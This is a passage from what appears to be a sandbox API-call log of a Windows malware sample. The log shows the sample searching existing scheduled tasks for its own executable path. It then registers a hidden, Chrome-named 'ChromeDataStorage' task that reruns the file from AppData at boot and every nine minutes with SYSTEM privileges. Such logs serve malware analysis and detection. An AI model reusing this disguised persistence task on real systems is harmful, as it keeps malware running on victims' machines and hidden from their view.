<MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{B210D694-C8DF-490d-9576-9E20CDBC20BD}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.435] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\mscms.dll,-200)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\mscms.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\mscms.dll,-202)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"C3B270C8-8291-4326-92F6-2FF65DE39010\">\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n    <SessionStateChangeTrigger id=\"79B8DA54-F688-4a18-B2D4-7AA891A193E8\">\r\n      <Enabled>true</Enabled>\r\n      <StateChange>ConsoleConnect</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{B210D694-C8DF-490d-9576-9E20CDBC20BD}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.435] IUnknown:Release (This=0x55ff60) returned 0x0
	[0073.435] IUnknown:Release (This=0x55fe68) returned 0x0
	[0073.435] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe68) returned 0x0
	[0073.436] ITaskFolderCollection:get_Count (in: This=0x55fe68, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.436] IUnknown:Release (This=0x55fe68) returned 0x0
	[0073.436] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.436] IUnknown:Release (This=0x55fd38) returned 0x0
	[0073.436] TaskScheduler:IUnknown:Release (This=0x552440) returned 0x0
	[0073.436] ITaskFolderCollection:get_Item (in: This=0x552370, index=0x128f64*(varType=0x3, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppFolder=0x129084 | out: ppFolder=0x129084*=0x552440) returned 0x0
	[0073.436] ITaskFolder:GetTasks (in: This=0x552440, flags=1, ppTasks=0x128f58 | out: ppTasks=0x128f58*=0x55fd38) returned 0x0
	[0073.436] IRegisteredTaskCollection:get_Count (in: This=0x55fd38, pCount=0x128f48 | out: pCount=0x128f48*=1) returned 0x0
	[0073.436] IRegisteredTaskCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x12, wReserved2=0x2440, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128f50 | out: ppRegisteredTask=0x128f50*=0x55fdf8) returned 0x0
	[0073.436] IRegisteredTask:get_Name (in: This=0x55fdf8, pName=0x128f54 | out: pName=0x128f54*="MP Scheduled Scan") returned 0x0
	[0073.436] IRegisteredTask:get_Xml (in: This=0x55fdf8, pXml=0x128f5c | out: pXml=0x128f5c*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>Scheduled Scan</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2000-01-01T05:04:52</StartBoundary>\r\n      <EndBoundary>2100-01-01T00:00:00</EndBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT0H1M0S</Duration>\r\n      <WaitTimeout>PT4H0M0S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>c:\\program files\\windows defender\\MpCmdRun.exe</Command>\r\n      <Arguments>Scan -ScheduleJob -WinTask -RestrictPrivilegesScan</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.438] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>Scheduled Scan</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2000-01-01T05:04:52</StartBoundary>\r\n      <EndBoundary>2100-01-01T00:00:00</EndBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT0H1M0S</Duration>\r\n      <WaitTimeout>PT4H0M0S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>c:\\program files\\windows defender\\MpCmdRun.exe</Command>\r\n      <Arguments>Scan -ScheduleJob -WinTask -RestrictPrivilegesScan</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.438] IUnknown:Release (This=0x55fdf8) returned 0x0
	[0073.438] IUnknown:Release (This=0x55fd38) returned 0x0
	[0073.438] ITaskFolder:GetFolders (in: This=0x552440, flags=0, ppFolders=0x128f4c | out: ppFolders=0x128f4c*=0x55fd38) returned 0x0
	[0073.439] ITaskFolderCollection:get_Count (in: This=0x55fd38, pCount=0x128f44 | out: pCount=0x128f44*=0) returned 0x0
	[0073.439] IUnknown:Release (This=0x55fd38) returned 0x0
	[0073.439] TaskScheduler:IUnknown:Release (This=0x552440) returned 0x0
	[0073.439] IUnknown:Release (This=0x552370) returned 0x0
	[0073.439] TaskScheduler:IUnknown:Release (This=0x552320) returned 0x0
	[0073.439] ITaskFolderCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x55, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x552320) returned 0x0
	[0073.439] ITaskFolder:GetTasks (in: This=0x552320, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x5523a0) returned 0x0
	[0073.440] IRegisteredTaskCollection:get_Count (in: This=0x5523a0, pCount=0x129060 | out: pCount=0x129060*=1) returned 0x0
	[0073.440] IRegisteredTaskCollection:get_Item (in: This=0x5523a0, index=0x128f64*(varType=0x3, wReserved1=0x12, wReserved2=0x2320, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x129068 | out: ppRegisteredTask=0x129068*=0x552498) returned 0x0
	[0073.440] IRegisteredTask:get_Name (in: This=0x552498, pName=0x12906c | out: pName=0x12906c*="SvcRestartTask") returned 0x0
	[0073.440] IRegisteredTask:get_Xml (in: This=0x552498, pXml=0x129074 | out: pXml=0x129074*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\osppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\osppc.dll,-200)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\osppc.dll,-201)</Description>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\system32\\sc.exe</Command>\r\n      <Arguments>start osppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.441] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\osppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\osppc.dll,-200)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\osppc.dll,-201)</Description>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\system32\\sc.exe</Command>\r\n      <Arguments>start osppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.442] IUnknown:Release (This=0x552498) returned 0x0
	[0073.442] IUnknown:Release (This=0x5523a0) returned 0x0
	[0073.442] ITaskFolder:GetFolders (in: This=0x552320, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x5523a0) returned 0x0
	[0073.442] ITaskFolderCollection:get_Count (in: This=0x5523a0, pCount=0x12905c | out: pCount=0x12905c*=0) returned 0x0
	[0073.442] IUnknown:Release (This=0x5523a0) returned 0x0
	[0073.442] TaskScheduler:IUnknown:Release (This=0x552320) returned 0x0
	[0073.442] ITaskFolderCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x55, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x552320) returned 0x0
	[0073.442] ITaskFolder:GetTasks (in: This=0x552320, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x552368) returned 0x0
	[0073.443] IRegisteredTaskCollection:get_Count (in: This=0x552368, pCount=0x129060 | out: pCount=0x129060*=0) returned 0x0
	[0073.443] IUnknown:Release (This=0x552368) returned 0x0
	[0073.443] ITaskFolder:GetFolders (in: This=0x552320, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x552368) returned 0x0
	[0073.443] ITaskFolderCollection:get_Count (in: This=0x552368, pCount=0x12905c | out: pCount=0x12905c*=0) returned 0x0
	[0073.443] IUnknown:Release (This=0x552368) returned 0x0
	[0073.443] TaskScheduler:IUnknown:Release (This=0x552320) returned 0x0
	[0073.443] IUnknown:Release (This=0x552948) returned 0x0
	[0073.443] AllocateAndInitializeSid (in: pIdentifierAuthority=0x12917c, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x129184 | out: pSid=0x129184*=0x177780*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
	[0073.443] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x177780*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x128ecc, cchName=0x12918c, ReferencedDomainName=0x128ccc, cchReferencedDomainName=0x129190, peUse=0x129158 | out: Name="SYSTEM", cchName=0x12918c, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x129190, peUse=0x129158) returned 1
	[0073.444] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x30) returned 0x1a89e0
	[0073.444] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0xf0) returned 0x173b10
	[0073.444] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x7d00) returned 0x1c8598
	[0073.444] GetLocalTime (in: lpSystemTime=0x129160 | out: lpSystemTime=0x129160*(wYear=0x7e3, wMonth=0x5, wDayOfWeek=0x2, wDay=0xe, wHour=0xf, wMinute=0x1f, wSecond=0x17, wMilliseconds=0x272)) 
	[0073.444] SystemTimeToFileTime (in: lpSystemTime=0x129160, lpFileTime=0x129170 | out: lpFileTime=0x129170) returned 1
	[0073.444] FileTimeToSystemTime (in: lpFileTime=0x129170, lpSystemTime=0x129160 | out: lpSystemTime=0x129160) returned 1
	[0073.445] RtlFreeHeap (HeapHandle=0x150000, Flags=0x8, BaseAddress=0x173b10) returned 1
	[0073.445] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x10) returned 0x177780
	[0073.445] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x10) returned 0x1777b0
	[0073.445] ITaskFolder:RegisterTask (in: This=0x552918, Path="ChromeDataStorage", XmlText="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n<Task version=\"1.2\"\nxmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n<RegistrationInfo>\n<Version>1.0.0</Version>\n<Author>AuthorName</Author><Description>Chrome Data Storage</Description>\n</RegistrationInfo>\n<Triggers>\n<BootTrigger>\n<Enabled>true</Enabled>\n</BootTrigger>\n<TimeTrigger>\n<Repetition>\n<Interval>PT9M</Interval>\n<Duration>P415DT14H23M</Duration>\n<StopAtDurationEnd>false</StopAtDurationEnd>\n</Repetition>\n<StartBoundary>2019-05-14T15:32:23</StartBoundary>\n<Enabled>true</Enabled>\n</TimeTrigger>\n</Triggers>\n<Principals>\n<Principal id=\"Author\">\n<RunLevel>HighestAvailable</RunLevel>\n<GroupId>NT AUTHORITY\\SYSTEM</GroupId>\n<LogonType>InteractiveToken</LogonType>\n</Principal>\n</Principals>\n<Settings>\n<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n<AllowHardTerminate>false</AllowHardTerminate>\n<StartWhenAvailable>true</StartWhenAvailable>\n<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\n<IdleSettings>\n<StopOnIdleEnd>true</StopOnIdleEnd>\n<RestartOnIdle>false</RestartOnIdle>\n</IdleSettings>\n<AllowStartOnDemand>true</AllowStartOnDemand>\n<Enabled>true</Enabled>\n<Hidden>true</Hidden>\n<RunOnlyIfIdle>false</RunOnlyIfIdle>\n<WakeToRun>false</WakeToRun>\n<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\n</Settings>\n<Actions Context=\"Author\">\n<Exec>\n<Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\n</Exec>\n</Actions>\n</Task>\n", flags=6, UserId=0x129170*(varType=0x8, wReserved1=0x1a7, wReserved2=0x1b0, wReserved3=0x0, varVal1="SYSTEM", varVal2=0x1), password=0x129180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=5, sddl=0x129194*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1294ec, varVal2=0x76d10a89), ppTask=0x1294e4 | out: ppTask=0x1294e4*=0x5522c0) returned 0x0
	[0073.491] RtlFreeHeap (HeapHandle=0x150000, Flags=0x8, BaseAddress=0x1777b0) returned 1
	[0073.492] RtlFreeHeap (HeapHandle=0x150000, Flags=0x8, BaseAddress=0x177780) returned 1
	[0073.492] ITaskFolder:GetTasks (in: This=0x552918, flags=1, ppTasks=0x129188 | out: ppTasks=0x129188*=0x552948) returned 0x0
	[0073.493] IRegisteredTaskCollection:get_Count (in: This=0x552948, pCount=0x129178 | out: pCount=0x129178*=3) returned 0x0
	[0073.493] IRegisteredTaskCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x1, varVal2=0x76a63ea3), ppRegisteredTask=0x129180 | out: ppRegisteredTask=0x129180*=0x552388) returned 0x0
	[0073.493] IRegisteredTask:get_Name (in: This=0x552388, pName=0x129184 | out: pName=0x129184*="ChromeDataStorage") returned 0x0
	[0073.493] IRegisteredTask:get_Xml (in: This=0x552388, pXml=0x12918c | out: pXml=0x12918c*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0.0</Version>\r\n    <Author>AuthorName</Author>\r\n    <Description>Chrome Data Storage</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT9M</Interval>\r\n        <Duration>P415DT14H23M</Duration>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2019-05-14T15:31:33</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n      <UserId>SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.496] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0.0</Version>\r\n    <Author>AuthorName</Author>\r\n    <Description>Chrome Data Storage</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT9M</Interval>\r\n        <Duration>P415DT14H23M</Duration>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2019-05-14T15:31:33</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n      <UserId>SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>"
	[0073.496] lstrcmpW (lpString1="ChromeDataStorage", lpString2="ChromeDataStorage") returned 0
